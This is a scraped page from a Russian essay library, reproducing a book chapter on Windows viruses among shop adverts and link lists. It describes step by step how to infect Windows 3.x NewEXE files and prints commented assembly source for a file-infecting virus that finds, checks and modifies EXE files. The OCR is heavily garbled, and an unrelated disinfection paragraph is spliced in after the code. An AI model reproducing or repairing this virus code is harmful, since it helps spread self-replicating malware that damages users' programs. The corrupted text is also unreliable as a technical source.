Библиотека Рефераты Курсовые Дипломы Поиск
Библиотека Рефераты Курсовые Дипломы Поиск
сделать стартовой добавить в избранное
Кефирный гриб на сайте www.za4et.net.ru

Компьютеры, Программирование Компьютеры, Программирование     Программное обеспечение Программное обеспечение

Вирусы под Windows

Брелок LED "Лампочка" классическая.
Брелок работает в двух автоматических режимах и горит в разных цветовых гаммах. Материал: металл, акрил. Для работы нужны 3 батарейки
131 руб
Раздел: Металлические брелоки
Коврик для запекания, силиконовый "Пекарь".
Коврик "Пекарь", сделанный из силикона, поможет Вам готовить вкусную и красивую выпечку. Благодаря материалу коврика, выпечка не
202 руб
Раздел: Коврики силиконовые для выпечки
Гуашь "Классика", 12 цветов.
Гуашевые краски изготавливаются на основе натуральных компонентов и высококачестсвенных пигментов с добавлением консервантов, не
170 руб
Раздел: 7 и более цветов

В этой главе рассказано о вирусах, заражающих фай- лы в операционной среде Wi dows. Наиболее подробно рассмотрены вирусы под Wi dows 95, Представлены исходные тексты вирусов с подробными комментариями, Также приведены основные сведения о запускаемых фай- лах программ под Wi dows, их структуре, отличиях от файлов DOS, Вирусы под Wi dows 3.11 В исполняемом файле Wi dows содержатся в различных комбинациях код, данные и ресурсы. Ресурсы - это BI -данные для прикладных про- грамм. Учитывая возможность запуска файла из DOS, формат данных должен распознаваться обеими системами - и DOS, и Wi dows. Для этого все исполняемые файлы под Wi dows содержат два заголов- ка. Первый заголовок (старый) - распознается DOS как программа, вы- водящая на экран " his program requires Microsof Wi dows". Второй заголовок ( ewEXE) - для работы в Wi dows (см. приложение). Как же заразить Wi dows ewEXE? На первый взгляд файл формата Wi E - обычный ЕХЕ-файл. Начинается он с заголовка ЕХЕ для DOS и программы (S UB), которая выводит сообщение " his program requires Microsof Wi dows". Если в ЕХЕ-заголовке по смещению 18h стоит число 40h или больше, значит по смещению 3Ch находится смещение заголовка ewEXE. Заголовок ewEXE начинается с символов " E". Далее идет собствен- но заголовок, в котором содержатся различные данные, в том числе ад- реса смещений таблиц сегментов, ресурсов и другие. После заголовка расположена таблица сегментов, за ней - все остальные таблицы, далее размещены собственно сегменты с кодом. Итак, порядок действий: 1. Адрес заголовка ewEXE (DOS Header 3Ch) уменьшается на 8. 2. Заголовок ewEXE сдвигается на 8 байт назад. 3. В таблицу сегментов добавляется новый элемент, описывающий сегмент вируса. 4. CS:IP ewEXE изменяется на начало вирусного кода, само тело вируса дописывается в конец файла. Для загрузки в память (надо перехватить вектор I 21h из-под Wi dows) необходимо использовать функции DPMI (I 31h). Дей- ствия: выделение сегмента, изменение его прав доступа, запись вируса, перехват прерывания 21h (делается с помощью функций DPMI). В качестве примера приведен полный исходный текст вируса под Wi dows. Принципы заражения такие же, как и при заражении^обычного ЕХЕ-фай- ла,- изменяется структура ЕХЕ-файла и среда, в которЬй он работает. .286 .MODEL I Y .CODE ;Сохраним регистры и флаги pushf pusha push ds push es .Проверим, доступен ли DPMI. Если доступен, Продолжаем, если нет - выходим mov ax,1686h i 2Fh or ax, ax jz dpmi exis ;Восстановим регистры и флаги exi : pop es pop ds popa popf .Запустим программу-носитель db OEAh reloclP dw 0 relocCS dw OFFFFh dpmi exis : ;Выделим линейный блок памяти, используя DPMI mov ax,0501h mov cx,OFFFFh xor bx.bx i 31 h ;Сохраним индекс и 32-битный линейный адрес .полученного блока памяти в стеке push si ~^ push di push bx push ex ;Создадим дескриптор в таблице LD хог ах,ах mov ex, 1 i 31 h ;B поле адреса полученного дескриптора .установим адрес нужного блока памяти mov bx,ax mov ах,7 pop dx pop ex i •31h ;B поле предела полученного дескриптора остановим размер выделенного блока памяти mov ах,8 mov dx,OFFFFh хог сх.с

х i 31h ;В поле прав доступа полученного дескриптора установим значение, соответствующее сегменту данных, доступному для чтения и записи mov ах,9 mov cl, 1111001 Ob хог ch,ch i 31h ;3агрузим селектор в регистр DS. После этого регистр DS будет оказывать на выделенный блок памяти mov ds.bx .Читаем из стека и сохраняем в памяти ;индекс полученного блока памяти pop Получим текущую D A mov ah,2Fh i 21 h mov ,es ;Найдем первый ЕХЕ-файл (маска .ЕХЕ) mov ah,4Eh xor ex,ex mov dx,OFFSE wild exe push ds push cs pop ds i 21 h pop ds ;Если файл найден, перейдем к заражению, иначе освободим ;выделенную область памяти и запустим программу-носитель j c fou d exe ;0свободим выделенную область памяти call free .Запустим программу-носитель jmp exi .Перейдем к следующему файлу - этот не подходит close exe: ; Закроем файл mov ah,3Eh i 21h ;Найдем следующий файл mov ah,4Fh i 21h ;Если файл найден, перейдем к заражению, иначе освободим -.выделенную область памяти и запустим программу-носитель j c fou d exe ;0свободим выделенную область памяти call free ;3апустим программу-носитель jmp exi ;Файл найден, проверим его на пригодность к заражению fou d ехе: ;0ткроем файл для чтения и записи push ds Ids dx, DWORD P R add dx.lEh mov ax,3D02h i 21 h pop ds .Прочтем старый заголовок mov dx.OFFSE old hdr mov bx.ax mov cx,40h mov ah,3Fh i 21h ;Проверим сигнатуру, это ЕХЕ-файл? cmp WORD P R ,"ZM" j e close exe [Проверим смещение таблицы настройки адресов. ;Если значение больше 40h, то это не обычный ЕХЕ-файл. ;Не будем сразу делать вывод, ;что это ewEXE, потому^что это может оказаться ;РЕ-, LE-, LX-execu able или другой ;(PE-execu able описан в разделе, [посвященном Wi dows 95, остальные ;типы ЕХЕ-файлов в этой книге не рассматриваются) cmp ,WORD P R 40h jb close exe .Перейдем ко второму заголовку (может быть, это ewEXE?): Переводим указатель к смещению, обозначенному в поле 3Ch mov dx.WORD P R mov ax,4200h i 21h ; Прочитаем второй заголовок mov dx.OFFSE ewJ-idr mov ex,40h mov ah,3fh i 21h [Проверим сигнатуру, если сигнатура " E", то это ewEXE-файл cmp WORD P R ,"E " j e close exe [Проверим, для Wi dows ли предназначен этот файл. Если да, будем ;заражать, иначе переходим к следующему файлу mov al, a d al,2 jz close exe .Переместим указатель чтения/записи в таблицу сегментов, ;к элементу, обозначающему сегмент точки старта программы. [Для этого прочтем значение регистра CS при запуске ;По номеру сегмента вычислим положение соответствующего ему [элемента в таблице сегментов dec dx shi dx,3 ;K результату прибавим смещение таблицы сегментов и смещение .заголовка ewEXE add dx,WORD P R mov cx.WORD P R [Переместим указатель чтения/записи mov ax,4200h i 21 h [Прочтем из таблицы сегментов смещение логического сектора mov dx,OFFSE emp mov ex, 2 mov ah,3Fh i 21 h .Вычислим смещение сегмента, опираясь на значения .смещения логического сектора и множителя секторов mov dx.WORD P R xor ax.ax cal e ry: shi dx,1 rcl ax,1 loop cal e ry .Переместим 16 старших бит 32-битного результата в регистр СХ mov cx,ax ;Прибавим к результату смещение стартового адреса (IP) add dx,WORD P R adc cx.O

;Переместим указатель позиции чтения/записи на точку старта .программы - результат вычисления mov ax,4200h i 21 h ;Считаем первые 10 байт после старта программы mov dx, OFFSE emp mov cx,10h mov ah,3Fh i 21 h Проверим, заражен ли файл. Если считанные 10 байт в точности ;совпадают с первыми 10-ю байтами нашего вируса, файл заражен. ;В этом случае переходим к поиску следующего, иначе - заражаем mov si.OFFSE emp push cs pop es xor di.di mov ex, 8 eld rep cmpsw j e ok o i fec jmp close exe Приступим к заражению ok o i fec : Переместим E-заголовок на 8 байт ближе к началу файла. ; Исправим соответствующие поля старого заголовка sub WORD P R ,8 sbb WORD P R ,0 ; Исправим значения таблиц в новом заголовке, чтобы переместились ;только заголовок и таблица сегментов (без остальных таблиц) add WORD P R ,8 add WORD P R ,8 add WORD P R ,8 ;Сохраним оригинальные значения точек входа CS и IP push WORD P R push WORD P R ;Добавим еще один сегмент в таблицу сегментов и установим ;точку входа на его начало mov WORD P R push WORD P R .Переместим указатель чтения/записи в начало файла ;(к старому заголовку) хог сх.сх xor dx.dx mov ax,4200h i 21 h ;3апишем старый заголовок, так как модифицированы ;некоторые поля его копии в памяти mov dx.OFFSE old hdr mov cx,40h mov ah,40h i 21 h ;Переместим указатель чтения/записи на начало нового заголовка (его переместили на 8 байт к началу файла) mov dx.WORD P R mov ax,4200h i 21 h ;3апишем новый заголовок, так как в его копии ;в памяти некоторые поля модифицированы mov dx, OFFSE ew hdr mov cx,40h mov ah,40h i 21h .Переместим указатель чтения/записи на 8 байт ;вперед - к началу таблицы сегментов хог сх.сх mov dx,8 mov ax,4201 h i 21h рассчитаем размер таблицы сегментов и считаем ее в память mov dx,OFFSE emp mov cx.WORD P R dec ex shi cx.3 push ex mov ah,3Fh i 21h Переместим указатель чтения/записи назад, к позиции ;за 8 байт перед началом таблицы сегментов pop dx push dx add dx,8 eg dx mov cx,-1 mov ax,4201h i 21h ;3апишем таблицу сегментов в файл, но не на ее прежнее место, ;а на 8 байт ближе к началу файла mov dx,OFFSE emp pop ex mov ah,40h i 21h .Прочтем текущую позицию чтения/записи (конец таблицы сегментов) xor сх,сх xor dx.dx mov^ ax,4201h i 21 h ;Сохраним в стеке текущую позицию чтения/записи push dx push ax .Получим длину файла, переместив указатель ^тения/записи в конец файла xor сх.сх xor dx,dx mov ax,4202h i 21 h ;Сохраним в стеке длину файла push dx push ax ;Вычислим и сохраним длину логического сектора mov cx.WORD P R ,ax ;Вычислим длину файла в логических секторах mov сх.ах pop ax pop dx div ex -.Учтем неполный сектор. Если в результате получился ;остаток, увеличим количество секторов or dx,dx jz o rmd i c ax o rmd: ;3аполним поля нового элемента в таблице сегментов mov ,OFFSE vir e d mov ,OFFSE vir e d ;Восстановим из стека позицию в файле конца таблицы секторов pop dx pop ex Переместим указатель чтения/записи к этой позиции mov ax,4200h i 21 h .Запишем в конец таблицы новый элемент mov dx,OFFSE my seg e ry mov ex,8 mov ah,40h i 21 h ;Скопируем тело вируса в область памяти, которую выделили ;в начале программы, для изменений в нем.

Советы по защите своего компьютера вы сможете найти в «Мягкой рухляди» этого номера. Но прежде, чем его защищать, нужно получить систему, свободную от непрошенного софта, а когда компьютер заражен, простая переустановка Windows, скорее всего, не поможет. Поэтому предлагаю следующую последовательность действий, пусть несколько параноидальную, зато почти гарантирующую требуемый результат («почти», потому что стопроцентной гарантии защищенности не даст никто). Прежде всего, сохраните все необходимые вам данные на внешнем носителе (компакт-диске, флэшке и так далее). После этого очистите главную загрузочную запись (MBR) жесткого диска (нулевой сектор), как это описывалось в ДК #10_2004, стр. 110, после чего выключите компьютер. Далее, для контроля, снова запустите diskedit.exe и убедитесь, что нулевой сектор остался пустым (существуют вирусы, правда, ныне практически исчезнувшие, которые прописываются в MBR и контролируют, чтобы их оттуда не стерли). Напомню выполнение этой процедуры удалит все данные с жесткого диска

1. Вирусы против технологии NX в Windows XP SP2

2. Культивирование вирусов

3. Вирус Эбола

4. Компьютерные вирусы и антивирусные программы

5. Полиморфные вирусы

6. Вирусы и их разновидности
7. Анализ системы безопасности Microsoft Windows 2000 Advanced Server и стратегий ее использования
8. Организация Linux - сервера для Windows клиентов

9. Создание клиентских частей SQL БД под ОС Windows`95 и WindowsNT

10. Вычисление площади сложной фигуры методом имитационного моделирования (Windows)

11. Защита программ от компьютерных вирусов

12. Компьютерные вирусы и антивирусы

13. Windows 98

14. Компьютерные вирусы, типы вирусов, методы борьбы с вирусами

15. Сравнение операционных систем /DOS, Windows 3.*, Windows 95, Windows NT/

16. Операционная система Windows

Глобус Земли физический + политический, с подсветкой, 250 мм.
Глобус Земли физический + политический, с подсветкой. Диаметр: 250 мм. Расцветка подставки в ассортименте, без возможности выбора!
769 руб
Раздел: Глобусы
Авто-вентилятор с функцией обогрева.
Каждый автомобилист знает, что нередко погода на улице заставляет нас дискомфортно чувствовать себя и в салоне собственного автомобиля. В
600 руб
Раздел: Прочее
Блюдо "Пасхальное", диаметр 25 см.
Блюдо. Диаметр: 25 см. Высота: 3 см. Материал: фарфор. В ассортименте, без возможности выбора.
515 руб
Раздел: Прочее

17. Отчет по практической работе "Изучение MS Windows & MS Word 4 Windows 2.0"

18. Текстовый редактор Word для Windows

19. Вирусы и антивирусное программное обеспечение

20. Основные принципы просесса инсталляции приложений в ОС Windows

21. Компьютерный файлово-загрузочный полиморфный стелс-вирус ONEHALF 3544, особенности алгоритма и методы борьбы с ним

22. Контрольные по информатике для заочников (вопросы по Windows, Word, Excel)
23. Windows 2000
Windows 2000
24. Вопросы на тему "Windows, Excel & Word" с тестами, иллюстрациями и пояснениями

25. Полный обзор Windows 98

26. Сравнение операционных систем: Linux и Windows

27. Компьютерные Вирусы. Программа-полифаг Aidstest

28. Вирусы гриппа и парагриппа

29. Вирус СПИД

30. Сексуально-трансмиссивные расстройства. Вирус папилломы человека.

31. Гепатит С. Строение вируса, профилактика, лечение, этиология, etc.

32. Компьютерные вирусы - понятие и классификация

Крикет "Зоопарк".
Комплект: 4 фигуры, 2 биты, 2 шарика. Длина молоточка: 42,5 см. Возраст: от 3 лет.
548 руб
Раздел: Гольф
Сменный фильтр "Аквафор В-100-6" (2 штуки).
B100-6 — универсальный сменный модуль для фильтров-кувшинов Аквафор. Надежно очищает воду от основных вредных примесей и эффективно ее
424 руб
Раздел: Фильтры для воды
Бейдж с рулеткой, 54x85 мм.
Рулетка с держателем для бэйджа (горизонтальный). Рулетка вытягивается на 80 см. Крепится при помощи металлического клипа на поясе или к
371 руб
Раздел: Бейджи, держатели, этикетки

33. Коммуникационные функции в Windows for workgroups

34. Вирусы. Интерферон

35. Чем опасны вирусы и как защитить себя от них?

36. Вирусы

37. Вирусы

38. Природа вирусов
39. Операционная система WINDOWS-98
40. Windows
Windows

41. Текстовой редактор “Word for Windows 6

42. Windows

43. Компьютерные вирусы и борьба с ними

44. Типовые задачи администрирования сети Windows 2000

45. Ваш собственный сервер: установка Windows Server 2003

46. Устранение неполадок при отсутствии на контроллерах домена Windows 2000 общих папок SYSVOL и NETLOGON

47. Архивация данных в Windows

48. Жесткое внедрение DLL в Windows-программы

Настольная игра "Запретный Остров. Приключения для смелых!".
Запретный остров – это семейная кооперативная игра, в которой игроки действуют совместно против игры. Вашей команде дерзких искателей
1215 руб
Раздел: Карточные игры
Лоток на 3 отделения, черный.
Применяется для сортировки и временного хранения документов, писем, счетов и другой документации. Неразборный. Количество секций:
352 руб
Раздел: Подставки, лотки для бумаг, футляры
Багетная рама "Bella", 40x50 см (цвет: серебряный + золотой).
Багетные рамы предназначены для оформления картин, вышивок и фотографий. Оформленное изделие всегда становится более выразительным и
651 руб
Раздел: Багетные рамы, для икон

49. Служба удаленного доступа (RAS) Windows NT

50. Графическая оболочка X-Windows System

51. Exe-вирусы

52. Заражения вирусом программных файлов

53. Windows, Microsoft Word и Microsoft Excel

54. Файловая система Windows
55. MS Windows
MS Windows
56. Windows NT - ОС нового поколения

57. Windows XP

58. Вирусы

59. Знакомство с Windows XP

60. История систем Windows

61. Компьютерные вирусы

62. Компьютерные вирусы

63. Операційна система MS Windows

64. Особенности операционной системы Windows 95

Пакеты с вырубной ручкой "Stones & Samson", 50х40 см (50 штук).
Размер: 50х40 см. В упаковке: 50 штук. Материал: полиэтилен (ПВД).
331 руб
Раздел: Узоры
Набор со стикерами и фоном "Транспорт".
Этот красочный набор стикеров включает в себя 5 глянцевых картинок, на которых изображены различные местности, а также более 165 виниловых
479 руб
Раздел: Альбомы, коллекции наклеек
Доска гладильная НВ1 Валенсия. Принт чехла "Доброе утро", 46x123,5 см..
Гладильная доска выполнена из высококачественного металла. Рабочая поверхность оснащена отверстиями для пара и обтянута чехлом из хлопка.
2647 руб
Раздел: Доски гладильные

65. Программа демонстрирующая иерархию окон Windows

66. Разработка программы контроллера автоматически связываемых объектов для управления конструкторской документацией в среде Windows 95/NT (дипломная работа)

67. Установка Windows 98

68. Экран в windows

69. Компьютерные вирусы и борьба с ними

70. Windows Forms: Современная модель программирования для создания GUI приложений
71. Как корректно удалить WinXP/2K и восстановить Windows 95 или 98
72. Распределенные вычисления на FreePascal под Windows

73. Перехват API-функций в Windows NT/2000/XP

74. Windows, Microsoft Word и Microsoft Excel

75. Построение многооконных приложений для Windows

76. Программа, демонстрирующая иерархию окон Windows

77. Тесты производительности Windows XP против Win 2000, NT4, 98 и ME

78. Оптимизация Windows XP SP1

79. Параметры электропитания и завершения работы Windows XP

80. Тонкая настройка Windows Firewall в Windows XP SP2

Тарелка Lubby "Веселые животные" с присоской.
Тарелка "Lubby" для кормления незаменима в период, когда Ваш малыш учится есть самостоятельно. Присоска препятствует свободному
345 руб
Раздел: Тарелки
Набор "Грибочки".
Игра используется в качестве пособия в предметной деятельности. В комплект входит деревянная платформа и 15 грибочков разной формы и
571 руб
Раздел: Счетные наборы, веера
Набор первоклассника, для мальчиков, 16 предметов.
В наборе 16 предметов: - Подставка для книг. - Настольное покрытие для творчества. - Веер "гласные". - Веер
721 руб
Раздел: Наборы канцелярские

81. Работа в Windows

82. Оптимизация Windows XP

83. Переустановка Windows

84. Windows XP Service Pack 2: пакет обновлений или новая ОС?

85. Автозагрузка в Windows XP

86. Краткий HELP по реестру Windows и по программам для его оптимизации
87. Как ломать программы Windows (C) ED!SON [UCF], перевод Mr.Boco/TCP
88. Windows Xp: Войди в систему красиво

89. Вирусы

90. Долгий старт Windows Vista

91. Архитектура памяти Windows CE 6

92. История компьютерных вирусов и противодействие им

93. «Летучий» вирус

94. Вирусы

95. Механизм взаимодействия вируса и клетки

96. Разнообразие вирусов

Карандаши цветные "Noris Club", треугольные, 24 цвета.
Количество цветов: 24. Материал корпуса: дерево. Форма корпуса: трехгранный. Твёрдость грифеля: мягкий. Тип карандаша: классический.
456 руб
Раздел: 13-24 цвета
Комплект постельного белья 1,5-спальный "Hello Kitty" (с наволочкой 50х70 см).
Добро пожаловать в мир популярных персонажей, супергероев и сказочных существ. Постельное белье для мальчиков и девочек украсит интерьер и
2453 руб
Раздел: Детское, подростковое
Матовая двусторонняя бумага для струйных принтеров "Lomond", 130 г/м2, 100 листов, А4.
Матовая бумага идеально подходит для печати изображений (например, иллюстрированных текстов), которые не должны утомлять глаз, но уступают
495 руб
Раздел: Фотобумага для цветной печати

97. Вирусы

98. Вирусы и природа их происхождения

99. Вирус инфекционного бронхита кур

100. Windows Movie Maker


Поиск Рефератов на сайте za4eti.ru Вы студент, и у Вас нет времени на выполнение письменных работ (рефератов, курсовых и дипломов)? Мы сможем Вам в этом помочь. Возможно, Вам подойдет что-то из ПЕРЕЧНЯ ПРЕДМЕТОВ И ДИСЦИПЛИН, ПО КОТОРЫМ ВЫПОЛНЯЮТСЯ РЕФЕРАТЫ, КУРСОВЫЕ И ДИПЛОМНЫЕ РАБОТЫ. 
Вы можете поискать нужную Вам работу в КОЛЛЕКЦИИ ГОТОВЫХ РЕФЕРАТОВ, КУРСОВЫХ И ДИПЛОМНЫХ РАБОТ, выполненных преподавателями московских ВУЗов за период более чем 10-летней работы. Эти работы Вы можете бесплатно СКАЧАТЬ.